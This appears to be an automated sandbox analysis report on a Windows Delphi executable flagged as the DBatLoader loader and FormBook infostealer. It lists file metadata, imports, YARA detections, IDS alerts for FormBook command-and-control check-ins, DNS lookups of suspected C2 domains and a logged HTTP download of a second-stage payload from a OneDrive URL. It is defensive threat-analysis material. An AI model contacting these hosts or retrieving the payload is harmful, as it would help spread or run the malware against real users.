                                                                                              SHA512:7a39e02e0c6b5036763a7646a5960de36230eaef32da6b36687aa71170bd2125775888ec71ff112fb76a38d17d77b650089257043288fae82598dee5e6987ed9
                                                                                              SSDEEP:12288:i1qMhtVLzLypCggIh36+O9dvjpQVeri4Z2qKk/RqIkr:WFhHzmQgn6+8T/r7saqI
                                                                                              TLSH:D4F47D6662D08637D02715389C07A7A8692FAEE02F14F8956BD53DCC5F383CE743926B
                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                              Icon Hash:2321270727090923
                                                                                              Entrypoint:0x4626e8
                                                                                              Entrypoint Section:.itext
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                              DLL Characteristics:
                                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:5a047051636dce23e36a7dceaf1507c0
                                                                                              Instruction
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              add esp, FFFFFFF0h
                                                                                              mov eax, 0046105Ch
                                                                                              call 00007FDD10D0EC15h
                                                                                              mov ecx, dword ptr [0046D410h]
                                                                                              mov eax, dword ptr [0046D324h]
                                                                                              mov eax, dword ptr [eax]
                                                                                              mov edx, dword ptr [00460A90h]
                                                                                              call 00007FDD10D615EDh
                                                                                              mov eax, dword ptr [0046D324h]
                                                                                              mov eax, dword ptr [eax]
                                                                                              call 00007FDD10D61661h
                                                                                              call 00007FDD10D0CD18h
                                                                                              lea eax, dword ptr [eax+00h]
                                                                                              add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x72000          0x25ac        .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x7e000          0x42400       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x77000          0x6eec        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x76000          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x72724          0x5e4         .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x6022c       0x60400   False     0.5191025771103897   data       6.531038724700122   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext  0x62000          0x724         0x800     False     0.57373046875        data       5.847823102407548   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data   0x63000          0xa49c        0xa600    False     0.08553746234939759  data       6.533389727605739   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss    0x6e000          0x3660        0x0       False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata  0x72000          0x25ac        0x2600    False     0.32452713815789475  data       5.139331879404015   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls    0x75000          0x34          0x0       False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata  0x76000          0x18          0x200     False     0.05078125           data       0.2108262677871819  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x77000          0x6eec        0x7000    False     0.6196986607142857   data       6.6810323966616     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc   0x7e000          0x42400       0x42400   False     0.4435620577830189   data       6.403601787519998   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name             RVA      Size     Type  Language  Country
RT_CURSOR        0x7ef0c  0x134    Targa image data - Map 64 x 65536 x 1 +32 "\001"  English  United States
RT_CURSOR        0x7f040  0x134    data  English  United States
RT_CURSOR        0x7f174  0x134    data  English  United States
RT_CURSOR        0x7f2a8  0x134    data  English  United States
RT_CURSOR        0x7f3dc  0x134    data  English  United States
RT_CURSOR        0x7f510  0x134    data  English  United States
RT_CURSOR        0x7f644  0x134    Targa image data - RGB 64 x 65536 x 1 +32 "\001"  English  United States
RT_BITMAP        0x7f778  0x128    Device independent bitmap graphic, 21 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x7f8a0  0x128    Device independent bitmap graphic, 19 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x7f9c8  0x128    Device independent bitmap graphic, 21 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x7faf0  0xe8     Device independent bitmap graphic, 13 x 16 x 4, image size 128  English  United States
RT_BITMAP        0x7fbd8  0x128    Device independent bitmap graphic, 17 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x7fd00  0x128    Device independent bitmap graphic, 20 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x7fe28  0xd0     Device independent bitmap graphic, 13 x 13 x 4, image size 104  English  United States
RT_BITMAP        0x7fef8  0x128    Device independent bitmap graphic, 21 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x80020  0x128    Device independent bitmap graphic, 17 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x80148  0x128    Device independent bitmap graphic, 21 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x80270  0x128    Device independent bitmap graphic, 19 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x80398  0x128    Device independent bitmap graphic, 21 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x804c0  0xe8     Device independent bitmap graphic, 12 x 16 x 4, image size 128  English  United States
RT_BITMAP        0x805a8  0x128    Device independent bitmap graphic, 17 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x806d0  0x128    Device independent bitmap graphic, 20 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x807f8  0xd0     Device independent bitmap graphic, 13 x 13 x 4, image size 104  English  United States
RT_BITMAP        0x808c8  0x128    Device independent bitmap graphic, 21 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x809f0  0x128    Device independent bitmap graphic, 17 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x80b18  0x128    Device independent bitmap graphic, 21 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x80c40  0x128    Device independent bitmap graphic, 19 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x80d68  0x128    Device independent bitmap graphic, 21 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x80e90  0xe8     Device independent bitmap graphic, 13 x 16 x 4, image size 128  English  United States
RT_BITMAP        0x80f78  0x128    Device independent bitmap graphic, 17 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x810a0  0x128    Device independent bitmap graphic, 20 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x811c8  0xd0     Device independent bitmap graphic, 13 x 13 x 4, image size 104  English  United States
RT_BITMAP        0x81298  0x128    Device independent bitmap graphic, 21 x 16 x 4, image size 192  English  United States
RT_BITMAP        0x813c0  0x128    Device independent bitmap graphic, 17 x 16 x 4, image size 192  English  United States
RT_ICON          0x814e8  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4096
RT_ICON          0x82590  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 9216
RT_ICON          0x84b38  0x5488   Device independent bitmap graphic, 72 x 144 x 32, image size 20736
RT_ICON          0x89fc0  0x94a8   Device independent bitmap graphic, 96 x 192 x 32, image size 36864
RT_STRING        0x93468  0x200    data
RT_STRING        0x93668  0x188    data
RT_STRING        0x937f0  0xc8     data
RT_STRING        0x938b8  0x350    data
RT_STRING        0x93c08  0x3d8    data
RT_STRING        0x93fe0  0x388    data
RT_STRING        0x94368  0x418    data
RT_STRING        0x94780  0x140    data
RT_STRING        0x948c0  0xcc     data
RT_STRING        0x9498c  0x1ec    data
RT_STRING        0x94b78  0x3b0    data
RT_STRING        0x94f28  0x354    data
RT_STRING        0x9527c  0x2a4    data
RT_RCDATA        0x95520  0x10     data
RT_RCDATA        0x95530  0x2a7c2  GIF image data, version 89a, 300 x 168  English  United States
RT_RCDATA        0xbfcf4  0x254    data
RT_RCDATA        0xbff48  0x3e0    Delphi compiled form 'TForm1'
RT_GROUP_CURSOR  0xc0328  0x14     Lotus unknown worksheet or configuration, revision 0x1  English  United States
RT_GROUP_CURSOR  0xc033c  0x14     Lotus unknown worksheet or configuration, revision 0x1  English  United States
RT_GROUP_CURSOR  0xc0350  0x14     Lotus unknown worksheet or configuration, revision 0x1  English  United States
RT_GROUP_CURSOR  0xc0364  0x14     Lotus unknown worksheet or configuration, revision 0x1  English  United States
RT_GROUP_CURSOR  0xc0378  0x14     Lotus unknown worksheet or configuration, revision 0x1  English  United States
RT_GROUP_CURSOR  0xc038c  0x14     Lotus unknown worksheet or configuration, revision 0x1  English  United States
RT_GROUP_CURSOR  0xc03a0  0x14     Lotus unknown worksheet or configuration, revision 0x1  English  United States
RT_GROUP_ICON    0xc03b4  0x3e     data
DLL           Import
oleaut32.dll  SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll    GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll  GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll  TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll    CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll     UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll   VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll  lstrcpyA, lstrcatA, _lread, _lopen, _llseek, _lclose, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey, IsValidSid
                                                                                              kernel32.dllSleep
                                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                              comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                              comdlg32.dllGetOpenFileNameA
                                                                                              URLAutodialHookCallback
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/29/22-18:26:33.912103 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49719 | 80 | 192.168.2.5 | 217.160.0.95
11/29/22-18:26:08.582417 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49715 | 80 | 192.168.2.5 | 192.0.78.141
11/29/22-18:26:33.912103 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49719 | 80 | 192.168.2.5 | 217.160.0.95
11/29/22-18:26:23.800962 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 52.85.92.84
11/29/22-18:26:33.912103 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49719 | 80 | 192.168.2.5 | 217.160.0.95
11/29/22-18:26:08.582417 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49715 | 80 | 192.168.2.5 | 192.0.78.141
11/29/22-18:26:23.800962 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 52.85.92.84
11/29/22-18:26:08.582417 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49715 | 80 | 192.168.2.5 | 192.0.78.141
11/29/22-18:26:23.800962 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 52.85.92.84
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2022 18:24:01.159205914 CET | 192.168.2.5 | 8.8.8.8 | 0x3277 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:24:02.097614050 CET | 192.168.2.5 | 8.8.8.8 | 0xb4c2 | Standard query (0) | ppqfqw.ph.files.1drv.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:08.541414976 CET | 192.168.2.5 | 8.8.8.8 | 0xcc02 | Standard query (0) | www.librairie-adrienne.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:13.612112999 CET | 192.168.2.5 | 8.8.8.8 | 0x953a | Standard query (0) | www.rematedeldia.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:18.722286940 CET | 192.168.2.5 | 8.8.8.8 | 0xb26a | Standard query (0) | www.thecuratedpour.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:23.756469965 CET | 192.168.2.5 | 8.8.8.8 | 0x5846 | Standard query (0) | www.customapronsnow.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:28.831734896 CET | 192.168.2.5 | 8.8.8.8 | 0xae1 | Standard query (0) | www.segurofunerarioar.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:33.864237070 CET | 192.168.2.5 | 8.8.8.8 | 0x5457 | Standard query (0) | www.kuechenpruefer.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2022 18:24:01.202867985 CET | 8.8.8.8 | 192.168.2.5 | 0x3277 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 18:24:02.146754980 CET | 8.8.8.8 | 192.168.2.5 | 0xb4c2 | No error (0) | ppqfqw.ph.files.1drv.com | ph-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 18:24:02.146754980 CET | 8.8.8.8 | 192.168.2.5 | 0xb4c2 | No error (0) | ph-files.fe.1drv.com | odc-ph-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 18:24:02.146754980 CET | 8.8.8.8 | 192.168.2.5 | 0xb4c2 | No error (0) | l-0003.l-dc-msedge.net | | 13.107.43.12 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:08.563268900 CET | 8.8.8.8 | 192.168.2.5 | 0xcc02 | No error (0) | www.librairie-adrienne.com | librairie-adrienne.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 18:26:08.563268900 CET | 8.8.8.8 | 192.168.2.5 | 0xcc02 | No error (0) | librairie-adrienne.com | | 192.0.78.141 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:08.563268900 CET | 8.8.8.8 | 192.168.2.5 | 0xcc02 | No error (0) | librairie-adrienne.com | | 192.0.78.240 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:13.632412910 CET | 8.8.8.8 | 192.168.2.5 | 0x953a | No error (0) | www.rematedeldia.com | compralo1234.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 18:26:13.632412910 CET | 8.8.8.8 | 192.168.2.5 | 0x953a | No error (0) | compralo1234.myshopify.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 18:26:13.632412910 CET | 8.8.8.8 | 192.168.2.5 | 0x953a | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:18.742017984 CET | 8.8.8.8 | 192.168.2.5 | 0xb26a | Name error (3) | www.thecuratedpour.com | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:23.777184010 CET | 8.8.8.8 | 192.168.2.5 | 0x5846 | No error (0) | www.customapronsnow.com | | 52.85.92.84 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:23.777184010 CET | 8.8.8.8 | 192.168.2.5 | 0x5846 | No error (0) | www.customapronsnow.com | | 52.85.92.99 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:23.777184010 CET | 8.8.8.8 | 192.168.2.5 | 0x5846 | No error (0) | www.customapronsnow.com | | 52.85.92.94 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:23.777184010 CET | 8.8.8.8 | 192.168.2.5 | 0x5846 | No error (0) | www.customapronsnow.com | | 52.85.92.122 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:28.853539944 CET | 8.8.8.8 | 192.168.2.5 | 0xae1 | Name error (3) | www.segurofunerarioar.com | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:33.889528990 CET | 8.8.8.8 | 192.168.2.5 | 0x5457 | No error (0) | www.kuechenpruefer.com | | 217.160.0.95 | A (IP address) | IN (0x0001) | false
                                                                                              • ppqfqw.ph.files.1drv.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49708 | 13.107.43.12 | 443 | C:\Users\user\Desktop\0321423605241625.exe
Timestamp | kBytes transferred | Direction | Data
2022-11-29 17:24:02 UTC | 0 | OUT | GET /y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3rlGujQmh2dpM-9vT8IEOnYjevggDBPg3L6krVTX5rpZ6Y9fWqq7mXN8HP0HSdlr6-fMy35G8DvzJqxvSasnXVIJpB-5dNG-tdgdNk_U_XYoTZ1ccJrC1sgInwIFqmsOi4T1bkt9-CIDRF_pvQqcEQA/Mwqrxeuzvim?download&psid=1 HTTP/1.1
                                                                                              User-Agent: 92
                                                                                              Host: ppqfqw.ph.files.1drv.com
                                                                                              Connection: Keep-Alive
2022-11-29 17:24:02 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                                              Cache-Control: public
                                                                                              Content-Length: 167894
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Location: https://ppqfqw.ph.files.1drv.com/y4mcSg4TVpIg-eA6Y1ciUp4Dzz62AcO4SwOj-306Rp8dovP_vJs6bBF8upLxcpz7eVdZGSx9Ol9ClEvWsBTGhGhDp1lOphmbBYAZeeG6kBcbNfX63XppGpQ9Lnf4aLFJrvafSJ-CRf7GOc_jYykk5VSi-hMNFrupox4BDhefW1nK17aA0ESQkVwL_6Hp36kpUg7
                                                                                              Expires: Mon, 27 Feb 2023 17:24:02 GMT
                                                                                              Last-Modified: Tue, 29 Nov 2022 05:23:43 GMT
                                                                                              Accept-Ranges: bytes
                                                                                              ETag: E0CF7F9E6AAF27EF!846.2
                                                                                              P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                              X-MSNSERVER: PH2PPF3096F872A
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              MS-CV: gEDtYfW2Y0yf4BLo6q8l4Q.0
                                                                                              X-SqlDataOrigin: S
                                                                                              CTag: aYzpFMENGN0Y5RTZBQUYyN0VGITg0Ni4yNTc
                                                                                              X-PreAuthInfo: rv;poba;
                                                                                              Content-Disposition: attachment; filename="Mwqrxeuzvim"
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-StreamOrigin: X
                                                                                              X-AsmVersion: UNKNOWN; 19.1047.1109.2003
                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                              X-MSEdge-Ref: Ref A: E56A57C8A57240D88FB130D3F214E3FF Ref B: VIEEDGE2305 Ref C: 2022-11-29T17:24:02Z
                                                                                              Date: Tue, 29 Nov 2022 17:24:02 GMT
                                                                                              Connection: close

Target ID: 0
Start time: 18:23:55
Start date: 29/11/2022
Path: C:\Users\user\Desktop\0321423605241625.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\0321423605241625.exe
Imagebase: 0x400000
File size: 750592 bytes
MD5 hash: EDB1382C354EC6C09C53473E5335703A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.308860487.0000000003BAE000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.308375056.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 1
Start time: 18:24:02
Start date: 29/11/2022
Path: C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\colorcpl.exe
Imagebase: 0x1140000
File size: 86528 bytes
MD5 hash: 746F3B5E7652EA0766BA10414D317981
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
